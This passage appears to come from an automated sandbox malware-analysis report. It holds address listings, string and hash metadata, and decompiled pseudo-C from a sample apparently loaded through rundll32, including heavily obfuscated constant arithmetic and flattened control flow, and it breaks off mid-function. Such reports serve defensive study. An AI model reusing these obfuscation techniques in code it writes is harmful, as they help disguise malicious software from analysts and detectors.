                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x008159e9
                                                                                                                      0x008159ef
                                                                                                                      0x00815b0b
                                                                                                                      0x00815b11
                                                                                                                      0x00815b14
                                                                                                                      0x00815b17
                                                                                                                      0x00815b1a
                                                                                                                      0x00815b1a
                                                                                                                      0x00815b1d
                                                                                                                      0x00815b22
                                                                                                                      0x00815b24
                                                                                                                      0x00815b27
                                                                                                                      0x00815b27
                                                                                                                      0x00815b2f
                                                                                                                      0x00815b32
                                                                                                                      0x00815ccd
                                                                                                                      0x00815b38
                                                                                                                      0x00815b38
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159f5
                                                                                                                      0x008159fb
                                                                                                                      0x00815abe
                                                                                                                      0x00815ada
                                                                                                                      0x00815afc
                                                                                                                      0x00815b01
                                                                                                                      0x00815b04
                                                                                                                      0x00815cb4
                                                                                                                      0x00815cb4
                                                                                                                      0x00000000
                                                                                                                      0x00815a01
                                                                                                                      0x00815a07
                                                                                                                      0x00815a69
                                                                                                                      0x00815a76
                                                                                                                      0x00815a7b
                                                                                                                      0x00815a82
                                                                                                                      0x00815a85
                                                                                                                      0x00815a8c
                                                                                                                      0x00815a91
                                                                                                                      0x00815a98
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x00815a09
                                                                                                                      0x00815a0f
                                                                                                                      0x00000000
                                                                                                                      0x00815a15
                                                                                                                      0x00815a27
                                                                                                                      0x00815a37
                                                                                                                      0x00815a29
                                                                                                                      0x00815a29
                                                                                                                      0x00815a29
                                                                                                                      0x00815a3c
                                                                                                                      0x00815a45
                                                                                                                      0x00815a4a
                                                                                                                      0x00000000
                                                                                                                      0x00815a4a
                                                                                                                      0x00815a0f
                                                                                                                      0x00815a07
                                                                                                                      0x008159fb
                                                                                                                      0x008159ef
                                                                                                                      0x00815cd4
                                                                                                                      0x00815cdd
                                                                                                                      0x00815cdd
                                                                                                                      0x00815b74
                                                                                                                      0x00815c59
                                                                                                                      0x00815c61
                                                                                                                      0x00815c94
                                                                                                                      0x00815c99
                                                                                                                      0x00815c9e
                                                                                                                      0x00815caa
                                                                                                                      0x00815caf
                                                                                                                      0x00000000
                                                                                                                      0x00815ca0
                                                                                                                      0x00815ca0
                                                                                                                      0x00000000
                                                                                                                      0x00815ca0
                                                                                                                      0x00815b7a
                                                                                                                      0x00815b80
                                                                                                                      0x00815c2e
                                                                                                                      0x00815c3a
                                                                                                                      0x00815c30
                                                                                                                      0x00815c32
                                                                                                                      0x00815c37
                                                                                                                      0x00815c37
                                                                                                                      0x00815c3f
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x00815b86
                                                                                                                      0x00815b8c
                                                                                                                      0x00815bfb
                                                                                                                      0x00815c00
                                                                                                                      0x00815c05
                                                                                                                      0x00815c0b
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00815b8e
                                                                                                                      0x00815b90
                                                                                                                      0x00000000
                                                                                                                      0x00815b96
                                                                                                                      0x00815ba7
                                                                                                                      0x00815ba8
                                                                                                                      0x00815bb7
                                                                                                                      0x00815bba
                                                                                                                      0x00815bbb
                                                                                                                      0x00815bc0
                                                                                                                      0x00815bc3
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00815b90
                                                                                                                      0x00815b8c
                                                                                                                      0x00815b80
                                                                                                                      0x00000000
                                                                                                                      0x00815cb9
                                                                                                                      0x00815cb9
                                                                                                                      0x00000000
                                                                                                                      0x00815cc5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )%I$,?D$4`$J<$KE$NU$[w$owF$3)
                                                                                                                      • API String ID: 0-2094660596
                                                                                                                      • Opcode ID: 4739080588a8bd29ffabcd1cba0414d088d0c954afae036dad15161931f03690
                                                                                                                      • Instruction ID: 28c44e03a5061bdfe7b3bb5324efcf37fbd6319668180397a6e9151e24826cf8
                                                                                                                      • Opcode Fuzzy Hash: 4739080588a8bd29ffabcd1cba0414d088d0c954afae036dad15161931f03690
                                                                                                                      • Instruction Fuzzy Hash: 5A223271108781CFD768CF25C486A9BBBE1FFC4758F10891DE69A8A261D7B18949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0082A0D3 Relevance: 11.6, Strings: 9, Instructions: 313COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0082A0D3(intOrPtr* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t358;
				void* _t366;
				void* _t375;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t426;
				intOrPtr _t430;
				signed int* _t431;

				_t431 =  &_v160;
				_t426 = __ecx;
				_v12 = __ecx;
				_v8 = 0x8c571a;
				_t430 = 0;
				_t375 = 0x79707ab;
				_v4 = 0;
				_v64 = 0xfc5ff;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x00003f17;
				_v140 = 0x873397;
				_v140 = _v140 * 0x50;
				_v140 = _v140 << 5;
				_v140 = _v140 << 4;
				_v140 = _v140 ^ 0x803e6000;
				_v112 = 0x5cc448;
				_v112 = _v112 | 0xb5fdf5b7;
				_v112 = _v112 >> 9;
				_v112 = _v112 ^ 0x005afefa;
				_v60 = 0x19d054;
				_t378 = 0x29;
				_v60 = _v60 / _t378;
				_v60 = _v60 ^ 0x0000a12d;
				_v40 = 0x4c7c9b;
				_t379 = 0x7b;
				_v40 = _v40 / _t379;
				_v40 = _v40 ^ 0x00009f31;
				_v88 = 0xb88e01;
				_v88 = _v88 << 8;
				_v88 = _v88 | 0xb280bd16;
				_v88 = _v88 ^ 0xba886110;
				_v80 = 0xf71efc;
				_v80 = _v80 << 9;
				_t380 = 0x34;
				_v80 = _v80 / _t380;
				_v80 = _v80 ^ 0x04950844;
				_v96 = 0xf5fda;
				_v96 = _v96 >> 7;
				_t381 = 0x11;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x00041aa2;
				_v156 = 0x96c5de;
				_v156 = _v156 / _t381;
				_v156 = _v156 ^ 0x88ccdc31;
				_v156 = _v156 * 0x3d;
				_v156 = _v156 ^ 0x96be8a04;
				_v72 = 0x71396c;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x367e7763;
				_v72 = _v72 ^ 0xf298a4dc;
				_v148 = 0xd59d39;
				_v148 = _v148 >> 6;
				_v148 = _v148 + 0xffff0863;
				_v148 = _v148 << 4;
				_v148 = _v148 ^ 0x0020b4d1;
				_v116 = 0x4e2a72;
				_v116 = _v116 ^ 0x41f61916;
				_t382 = 0x66;
				_v116 = _v116 / _t382;
				_v116 = _v116 ^ 0xb72c0337;
				_v116 = _v116 ^ 0xb7828c59;
				_v28 = 0x7f34ff;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0xfe6bca43;
				_v124 = 0x9f58a2;
				_v124 = _v124 + 0xffff9c37;
				_v124 = _v124 + 0x725a;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x4fb1837f;
				_v52 = 0xa9f0c8;
				_v52 = _v52 + 0xfffffc3c;
				_v52 = _v52 ^ 0x00ad5534;
				_v24 = 0xa43c6e;
				_t383 = 0x6e;
				_v24 = _v24 * 0x5b;
				_v24 = _v24 ^ 0x3a644c1a;
				_v132 = 0x7fb628;
				_v132 = _v132 * 0xb;
				_v132 = _v132 << 6;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x9dcf3d61;
				_v100 = 0x597f63;
				_v100 = _v100 | 0xd4d51309;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xbafad16c;
				_v108 = 0x4d061a;
				_v108 = _v108 >> 2;
				_v108 = _v108 ^ 0xd197d397;
				_v108 = _v108 + 0xffff042d;
				_v108 = _v108 ^ 0xd1833bae;
				_v20 = 0x2586e5;
				_v20 = _v20 + 0x8581;
				_v20 = _v20 ^ 0x0026b83c;
				_v92 = 0x3ae4f5;
				_v92 = _v92 << 1;
				_v92 = _v92 << 0xb;
				_v92 = _v92 ^ 0xae4bd9c6;
				_v44 = 0xe6dc30;
				_v44 = _v44 ^ 0xd3982ed3;
				_v44 = _v44 ^ 0xd37e8c85;
				_v144 = 0xe42628;
				_v144 = _v144 | 0xc37700ac;
				_v144 = _v144 >> 0xa;
				_v144 = _v144 << 0xc;
				_v144 = _v144 ^ 0x0fd23fe2;
				_v152 = 0x41402a;
				_t186 =  &_v152; // 0x41402a
				_t384 = 0x19;
				_v152 =  *_t186 / _t383;
				_v152 = _v152 * 0x6a;
				_v152 = _v152 ^ 0x2485591b;
				_v152 = _v152 ^ 0x24bff8d4;
				_v160 = 0xbf0758;
				_v160 = _v160 + 0x522b;
				_v160 = _v160 >> 0xe;
				_v160 = _v160 + 0xffff65d4;
				_v160 = _v160 ^ 0xfff1feea;
				_v84 = 0x1a9ecc;
				_v84 = _v84 << 0x10;
				_t385 = 0x2d;
				_v84 = _v84 / _t384;
				_v84 = _v84 ^ 0x065118ef;
				_v120 = 0x6a6625;
				_t219 =  &_v120; // 0x6a6625
				_v120 =  *_t219 / _t385;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 + 0x1650;
				_v120 = _v120 ^ 0x00013394;
				_v76 = 0x6cd503;
				_v76 = _v76 + 0xffff64c6;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x09bb62c3;
				_v128 = 0x4363ee;
				_v128 = _v128 | 0x70162fad;
				_v128 = _v128 * 0x15;
				_v128 = _v128 + 0xffff87d6;
				_v128 = _v128 ^ 0x372e6b7a;
				_v36 = 0xd9ddf9;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x1b34c995;
				_v136 = 0xc7126f;
				_v136 = _v136 << 3;
				_v136 = _v136 >> 6;
				_v136 = _v136 + 0x2e5f;
				_v136 = _v136 ^ 0x001d82e9;
				_v104 = 0x7714f2;
				_v104 = _v104 << 2;
				_v104 = _v104 * 5;
				_t358 = 0x5786d8d;
				_v104 = _v104 | 0x0a59959c;
				_v104 = _v104 ^ 0x0b5ace50;
				_v68 = 0x585054;
				_v68 = _v68 ^ 0x33c1c88e;
				_v68 = _v68 ^ 0x9bceaa07;
				_v68 = _v68 ^ 0xa855990f;
				_v56 = 0xa2136b;
				_v56 = _v56 + 0x4ebb;
				_v56 = _v56 ^ 0x00a98962;
				_v32 = 0x51a57b;
				_v32 = _v32 >> 0xe;
				_v32 = _v32 ^ 0x0002096e;
				_v48 = 0x9fd766;
				_v48 = _v48 | 0x00a10b6a;
				_v48 = _v48 ^ 0x00bfd9fa;
				do {
					while(_t375 != _t358) {
						if(_t375 == 0x79707ab) {
							_t375 = 0x7c4530c;
							continue;
						} else {
							if(_t375 == 0x7c4530c) {
								_push(_v156);
								_push(_v96);
								_push(0x10001678);
								_t366 = E00819F66(_v88, _v80, __eflags);
								_push(_v28);
								_push(_v116);
								_t302 =  &_v148; // 0x372e6b7a
								_push(0x10001538);
								__eflags = E008202DA(E00819F66(_v72,  *_t302, __eflags), _v64, _v124, _t366,  &_v16, _v52, _v24) - _v140;
								_t375 =  ==  ? 0x5786d8d : 0xbb932f6;
								E0081A203(_v132, _v100, _v108, _t366);
								E0081A203(_v20, _v92, _v44, _t367);
								_t426 = _v12;
								_t431 =  &(_t431[0xf]);
								L10:
								_t358 = 0x5786d8d;
								goto L11;
							} else {
								if(_t375 != 0xfc0b370) {
									goto L11;
								} else {
									E00816427(_v32, _v40, _v16, _v48);
								}
							}
						}
						L6:
						return _t430;
					}
					_push(_v84);
					_push(_v160);
					_push(0x10001588);
					__eflags = E0082EDE2(_v112, _v120, _v16,  *_t426, _v76, _v144, _v128,  *((intOrPtr*)(_t426 + 4)), _v36, _v136, E00819F66(_v144, _v152, __eflags),  *0x10025c9c + 8) - _v60;
					_t375 = 0xfc0b370;
					_t430 =  ==  ? 1 : _t430;
					E0081A203(_v104, _v68, _v56, _t359);
					_t431 =  &(_t431[0xf]);
					goto L10;
					L11:
					__eflags = _t375 - 0xbb932f6;
				} while (__eflags != 0);
				goto L6;
			}

























































                                                                                                                      0x0082a0d3
                                                                                                                      0x0082a0dd
                                                                                                                      0x0082a0df
                                                                                                                      0x0082a0e6
                                                                                                                      0x0082a0f3
                                                                                                                      0x0082a0f5
                                                                                                                      0x0082a0fa
                                                                                                                      0x0082a101
                                                                                                                      0x0082a109
                                                                                                                      0x0082a10e
                                                                                                                      0x0082a116
                                                                                                                      0x0082a125
                                                                                                                      0x0082a129
                                                                                                                      0x0082a12e
                                                                                                                      0x0082a133
                                                                                                                      0x0082a13b
                                                                                                                      0x0082a143
                                                                                                                      0x0082a14b
                                                                                                                      0x0082a150
                                                                                                                      0x0082a158
                                                                                                                      0x0082a164
                                                                                                                      0x0082a169
                                                                                                                      0x0082a16f
                                                                                                                      0x0082a177
                                                                                                                      0x0082a189
                                                                                                                      0x0082a18e
                                                                                                                      0x0082a197
                                                                                                                      0x0082a1a2
                                                                                                                      0x0082a1aa
                                                                                                                      0x0082a1af
                                                                                                                      0x0082a1b7
                                                                                                                      0x0082a1bf
                                                                                                                      0x0082a1c7
                                                                                                                      0x0082a1d0
                                                                                                                      0x0082a1d5
                                                                                                                      0x0082a1db
                                                                                                                      0x0082a1e3
                                                                                                                      0x0082a1eb
                                                                                                                      0x0082a1f5
                                                                                                                      0x0082a1f6
                                                                                                                      0x0082a1fa
                                                                                                                      0x0082a202
                                                                                                                      0x0082a210
                                                                                                                      0x0082a214
                                                                                                                      0x0082a221
                                                                                                                      0x0082a225
                                                                                                                      0x0082a22d
                                                                                                                      0x0082a235
                                                                                                                      0x0082a23a
                                                                                                                      0x0082a242
                                                                                                                      0x0082a24a
                                                                                                                      0x0082a252
                                                                                                                      0x0082a257
                                                                                                                      0x0082a25f
                                                                                                                      0x0082a264
                                                                                                                      0x0082a26c
                                                                                                                      0x0082a274
                                                                                                                      0x0082a284
                                                                                                                      0x0082a289
                                                                                                                      0x0082a28f
                                                                                                                      0x0082a297
                                                                                                                      0x0082a29f
                                                                                                                      0x0082a2aa
                                                                                                                      0x0082a2b2
                                                                                                                      0x0082a2bd
                                                                                                                      0x0082a2c5
                                                                                                                      0x0082a2cd
                                                                                                                      0x0082a2d5
                                                                                                                      0x0082a2da
                                                                                                                      0x0082a2e2
                                                                                                                      0x0082a2ed
                                                                                                                      0x0082a2f8
                                                                                                                      0x0082a303
                                                                                                                      0x0082a316
                                                                                                                      0x0082a319
                                                                                                                      0x0082a320
                                                                                                                      0x0082a32b
                                                                                                                      0x0082a338
                                                                                                                      0x0082a33c
                                                                                                                      0x0082a341
                                                                                                                      0x0082a346
                                                                                                                      0x0082a34e
                                                                                                                      0x0082a356
                                                                                                                      0x0082a35e
                                                                                                                      0x0082a363
                                                                                                                      0x0082a36b
                                                                                                                      0x0082a373
                                                                                                                      0x0082a378
                                                                                                                      0x0082a380
                                                                                                                      0x0082a388
                                                                                                                      0x0082a390
                                                                                                                      0x0082a39b
                                                                                                                      0x0082a3a6
                                                                                                                      0x0082a3b1
                                                                                                                      0x0082a3b9
                                                                                                                      0x0082a3bd
                                                                                                                      0x0082a3c2
                                                                                                                      0x0082a3ca
                                                                                                                      0x0082a3d5
                                                                                                                      0x0082a3e0
                                                                                                                      0x0082a3eb
                                                                                                                      0x0082a3f3
                                                                                                                      0x0082a3fb
                                                                                                                      0x0082a400
                                                                                                                      0x0082a405
                                                                                                                      0x0082a40d
                                                                                                                      0x0082a415
                                                                                                                      0x0082a41b
                                                                                                                      0x0082a41c
                                                                                                                      0x0082a429
                                                                                                                      0x0082a42d
                                                                                                                      0x0082a435
                                                                                                                      0x0082a43d
                                                                                                                      0x0082a445
                                                                                                                      0x0082a44d
                                                                                                                      0x0082a452
                                                                                                                      0x0082a45a
                                                                                                                      0x0082a462
                                                                                                                      0x0082a46a
                                                                                                                      0x0082a475
                                                                                                                      0x0082a476
                                                                                                                      0x0082a47a
                                                                                                                      0x0082a484
                                                                                                                      0x0082a48c
                                                                                                                      0x0082a492
                                                                                                                      0x0082a496
                                                                                                                      0x0082a49b
                                                                                                                      0x0082a4a3
                                                                                                                      0x0082a4ab
                                                                                                                      0x0082a4b3
                                                                                                                      0x0082a4c0
                                                                                                                      0x0082a4c4
                                                                                                                      0x0082a4cc
                                                                                                                      0x0082a4d4
                                                                                                                      0x0082a4e1
                                                                                                                      0x0082a4e5
                                                                                                                      0x0082a4ed
                                                                                                                      0x0082a4f5
                                                                                                                      0x0082a500
                                                                                                                      0x0082a508
                                                                                                                      0x0082a513
                                                                                                                      0x0082a51b
                                                                                                                      0x0082a520
                                                                                                                      0x0082a525
                                                                                                                      0x0082a52d
                                                                                                                      0x0082a535
                                                                                                                      0x0082a53d
                                                                                                                      0x0082a547
                                                                                                                      0x0082a54b
                                                                                                                      0x0082a550
                                                                                                                      0x0082a558
                                                                                                                      0x0082a560
                                                                                                                      0x0082a568
                                                                                                                      0x0082a570
                                                                                                                      0x0082a578
                                                                                                                      0x0082a580
                                                                                                                      0x0082a588
                                                                                                                      0x0082a590
                                                                                                                      0x0082a598
                                                                                                                      0x0082a5a3
                                                                                                                      0x0082a5ab
                                                                                                                      0x0082a5b6
                                                                                                                      0x0082a5c1
                                                                                                                      0x0082a5cc
                                                                                                                      0x0082a5d7
                                                                                                                      0x0082a5d7
                                                                                                                      0x0082a5e5
                                                                                                                      0x0082a6e7
                                                                                                                      0x00000000
                                                                                                                      0x0082a5eb
                                                                                                                      0x0082a5f1
                                                                                                                      0x0082a62f
                                                                                                                      0x0082a633
                                                                                                                      0x0082a63f
                                                                                                                      0x0082a644
                                                                                                                      0x0082a649
                                                                                                                      0x0082a652
                                                                                                                      0x0082a656
                                                                                                                      0x0082a65e
                                                                                                                      0x0082a69e
                                                                                                                      0x0082a6b5
                                                                                                                      0x0082a6b8
                                                                                                                      0x0082a6d3
                                                                                                                      0x0082a6d8
                                                                                                                      0x0082a6df
                                                                                                                      0x0082a77b
                                                                                                                      0x0082a77b
                                                                                                                      0x00000000
                                                                                                                      0x0082a5f3
                                                                                                                      0x0082a5f9
                                                                                                                      0x00000000
                                                                                                                      0x0082a5ff
                                                                                                                      0x0082a61b
                                                                                                                      0x0082a621
                                                                                                                      0x0082a5f9
                                                                                                                      0x0082a5f1
                                                                                                                      0x0082a624
                                                                                                                      0x0082a62e
                                                                                                                      0x0082a62e
                                                                                                                      0x0082a6f1
                                                                                                                      0x0082a6f5
                                                                                                                      0x0082a701
                                                                                                                      0x0082a756
                                                                                                                      0x0082a758
                                                                                                                      0x0082a765
                                                                                                                      0x0082a773
                                                                                                                      0x0082a778
                                                                                                                      0x00000000
                                                                                                                      0x0082a780
                                                                                                                      0x0082a780
                                                                                                                      0x0082a780
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %fj$(&$*@A$+R$TPX$_.$cw~6$r*N$zk.7
                                                                                                                      • API String ID: 0-4179132742
                                                                                                                      • Opcode ID: 27272dbc85d7bd84491a8b360d47140a79a37765126f2e62aad6e2b089615009
                                                                                                                      • Instruction ID: e21b986debef690a434dfdb71046672a55b4f00a4d4f8193c03111f99b74a58c
                                                                                                                      • Opcode Fuzzy Hash: 27272dbc85d7bd84491a8b360d47140a79a37765126f2e62aad6e2b089615009
                                                                                                                      • Instruction Fuzzy Hash: DCF1FD715083809FD7A8CF25D58AA4BBBE2FBC4748F50891DF59A86260DBB19949CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 008250F9 Relevance: 10.3, Strings: 8, Instructions: 349COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E008250F9() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int* _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t407;
				signed int* _t428;
				void* _t429;
				signed short* _t435;
				signed int* _t436;

				_t436 =  &_v1720;
				_v1644 = 0xf4f2e5;
				_v1644 = _v1644 << 6;
				_t397 = 0x4a;
				_v1644 = _v1644 / _t397;
				_v1644 = _v1644 ^ 0x00d3d8d4;
				_t395 = 0;
				_v1660 = 0x8afd01;
				_t429 = 0xc405385;
				_v1660 = _v1660 | 0xf6dee043;
				_v1660 = _v1660 ^ 0x10b315be;
				_t398 = 0x45;
				_v1660 = _v1660 / _t398;
				_v1660 = _v1660 ^ 0x035da190;
				_v1692 = 0xc25321;
				_v1692 = _v1692 | 0x3e4ae4fc;
				_t399 = 0x12;
				_v1692 = _v1692 * 0x47;
				_v1692 = _v1692 ^ 0x6159278c;
				_v1692 = _v1692 ^ 0x0b15fa01;
				_v1572 = 0xf82306;
				_v1572 = _v1572 | 0xe3d21ea1;
				_v1572 = _v1572 ^ 0xe3f9e5ad;
				_v1676 = 0x48d4cb;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffff2f85;
				_v1676 = _v1676 + 0x9649;
				_v1676 = _v1676 ^ 0x048c097a;
				_v1584 = 0x8f76c2;
				_v1584 = _v1584 * 0x1d;
				_v1584 = _v1584 ^ 0x10457475;
				_v1596 = 0xadf885;
				_v1596 = _v1596 ^ 0xa065608b;
				_v1596 = _v1596 ^ 0xa0c2245b;
				_v1684 = 0xeb1e45;
				_v1684 = _v1684 + 0x7cda;
				_v1684 = _v1684 / _t399;
				_v1684 = _v1684 + 0xffffa266;
				_v1684 = _v1684 ^ 0x0000adef;
				_v1632 = 0x65fdd9;
				_v1632 = _v1632 + 0xb49;
				_v1632 = _v1632 + 0xfffffa9d;
				_v1632 = _v1632 ^ 0x00600454;
				_v1716 = 0x9184ac;
				_v1716 = _v1716 + 0xffff0d2e;
				_v1716 = _v1716 | 0x6897691f;
				_v1716 = _v1716 ^ 0x2cb5e262;
				_v1716 = _v1716 ^ 0x442095be;
				_v1576 = 0x53941d;
				_v1576 = _v1576 >> 2;
				_v1576 = _v1576 ^ 0x001525d4;
				_v1640 = 0xd435ce;
				_v1640 = _v1640 + 0xffff1394;
				_v1640 = _v1640 + 0xffff8dc5;
				_v1640 = _v1640 ^ 0x00d594ec;
				_v1708 = 0x173594;
				_v1708 = _v1708 ^ 0xe44a87fe;
				_v1708 = _v1708 << 7;
				_v1708 = _v1708 + 0xee7d;
				_v1708 = _v1708 ^ 0x2ed8d8cc;
				_v1700 = 0x94f2ae;
				_v1700 = _v1700 << 3;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 * 0x58;
				_v1700 = _v1700 ^ 0x66d58e50;
				_v1604 = 0xd84545;
				_v1604 = _v1604 | 0x98cc5948;
				_v1604 = _v1604 ^ 0x98d8436e;
				_v1668 = 0xea4a2f;
				_v1668 = _v1668 + 0xf7bd;
				_v1668 = _v1668 >> 7;
				_v1668 = _v1668 ^ 0xf693418b;
				_v1668 = _v1668 ^ 0xf6966bd3;
				_v1580 = 0xa2c8e;
				_v1580 = _v1580 + 0x2944;
				_v1580 = _v1580 ^ 0x00011cb1;
				_v1720 = 0x34ce8d;
				_v1720 = _v1720 | 0xf5ffffea;
				_v1720 = _v1720 >> 9;
				_v1720 = _v1720 ^ 0x00732654;
				_v1564 = 0x8a9f58;
				_v1564 = _v1564 + 0x7c05;
				_v1564 = _v1564 ^ 0x008f283e;
				_v1588 = 0xa4f562;
				_v1588 = _v1588 ^ 0x7b7d16a6;
				_v1588 = _v1588 ^ 0x7bd14885;
				_v1704 = 0xee28fd;
				_v1704 = _v1704 + 0xffffe5b2;
				_v1704 = _v1704 + 0xffff824b;
				_v1704 = _v1704 + 0x581e;
				_v1704 = _v1704 ^ 0x00e0f0ab;
				_v1712 = 0x91da58;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 ^ 0x485191fe;
				_v1712 = _v1712 ^ 0x920a86f0;
				_v1624 = 0xf1deea;
				_t400 = 3;
				_v1624 = _v1624 / _t400;
				_t401 = 0x38;
				_v1624 = _v1624 * 0x4f;
				_v1624 = _v1624 ^ 0x18ea6ffc;
				_v1680 = 0x898c63;
				_v1680 = _v1680 * 0x6a;
				_v1680 = _v1680 * 0x38;
				_v1680 = _v1680 | 0xa82efbb3;
				_v1680 = _v1680 ^ 0xfd6ff7e4;
				_v1688 = 0xae251e;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 >> 0xf;
				_v1688 = _v1688 + 0xb719;
				_v1688 = _v1688 ^ 0x000aff47;
				_v1696 = 0x40e656;
				_v1696 = _v1696 | 0x21fda4e6;
				_v1696 = _v1696 + 0xca7;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xf7c0cc6c;
				_v1652 = 0x8f24c5;
				_v1652 = _v1652 << 0xb;
				_v1652 = _v1652 ^ 0x5fc65761;
				_v1652 = _v1652 ^ 0x26eed855;
				_v1600 = 0xeb50f4;
				_v1600 = _v1600 | 0xe5f9ced2;
				_v1600 = _v1600 ^ 0xe5f6f1e5;
				_v1672 = 0x2ac6e7;
				_v1672 = _v1672 / _t401;
				_v1672 = _v1672 + 0xffffde53;
				_v1672 = _v1672 + 0xffff94e0;
				_v1672 = _v1672 ^ 0x000ac548;
				_v1648 = 0x7ee323;
				_v1648 = _v1648 ^ 0xc4404dab;
				_v1648 = _v1648 << 2;
				_v1648 = _v1648 ^ 0x10f162dd;
				_v1568 = 0xe6f77a;
				_v1568 = _v1568 | 0x9ec6220d;
				_v1568 = _v1568 ^ 0x9ee5ede4;
				_v1616 = 0x905f8c;
				_v1616 = _v1616 + 0xffff5c7c;
				_v1616 = _v1616 >> 2;
				_v1616 = _v1616 ^ 0x0024325f;
				_v1592 = 0xde4b6;
				_v1592 = _v1592 * 0x3f;
				_v1592 = _v1592 ^ 0x03679ec9;
				_v1664 = 0xe0cee4;
				_v1664 = _v1664 >> 2;
				_v1664 = _v1664 * 0x13;
				_v1664 = _v1664 * 0x71;
				_v1664 = _v1664 ^ 0xd75e35a6;
				_v1636 = 0x97f252;
				_v1636 = _v1636 | 0xcb237ae2;
				_v1636 = _v1636 << 0xf;
				_v1636 = _v1636 ^ 0xfd7df459;
				_v1656 = 0xc6c2a7;
				_v1656 = _v1656 + 0x66f2;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 | 0xc8135773;
				_v1656 = _v1656 ^ 0xc81a6fdc;
				_v1608 = 0xd95490;
				_v1608 = _v1608 + 0xffff3702;
				_v1608 = _v1608 ^ 0x00d9a4ac;
				_v1612 = 0x2487c2;
				_t435 = _v1608;
				_v1612 = _v1612 * 0x77;
				_v1612 = _v1612 << 4;
				_v1612 = _v1612 ^ 0x0fb1a599;
				_v1620 = 0xa1030c;
				_v1620 = _v1620 >> 3;
				_v1620 = _v1620 << 0x10;
